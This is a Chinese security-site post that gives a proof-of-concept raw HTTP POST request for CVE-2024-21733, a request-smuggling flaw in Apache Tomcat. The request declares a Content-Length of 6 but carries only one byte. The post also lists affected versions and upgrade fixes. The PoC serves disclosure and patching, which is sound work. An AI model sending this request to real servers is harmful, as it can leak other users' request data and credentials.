CVE-2024-21733 POC Apache Tomcat请求走私漏洞

admin 2024年8月20日21:05:51CVE-2024-21733 POC Apache Tomcat请求走私漏洞已关闭评论85 views字数 892阅读2分58秒阅读模式

漏洞介绍

未完成的 POST 请求触发了可能包含的错误响应 来自另一个用户的先前请求的数据。在某些情况下,这可能会泄露敏感数据,例如明文凭据。

POC

POST / HTTP/1.1
Host: hostname
Sec-Ch-Ua:"Chromium";v="119","Not?A_Brand";v="24"
Sec-Ch-Ua-Mobile:?0
Sec-Ch-Ua-Platform:"Linux"
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0(Windows NT 10.0;Win64; x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/119.0.6045.159Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: keep-alive
Content-Length: 6
Content-Type: application/x-www-form-urlencoded

X

影响版本

影响版本

Apache Tomcat 9.0.0-M11 到 9.0.43
Apache Tomcat 8.5.7 到 8.5.63

修复建议:

缓解: 受影响版本的用户应应用以下方法之一 缓解措施:

  • • 升级到 Apache Tomcat 9.0.44 或更高版本
  • • 升级到 Apache Tomcat 8.5.64 或更高版本

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月20日21:05:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-21733 POC Apache Tomcat请求走私漏洞https://cn-sec.com/archives/3082425.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.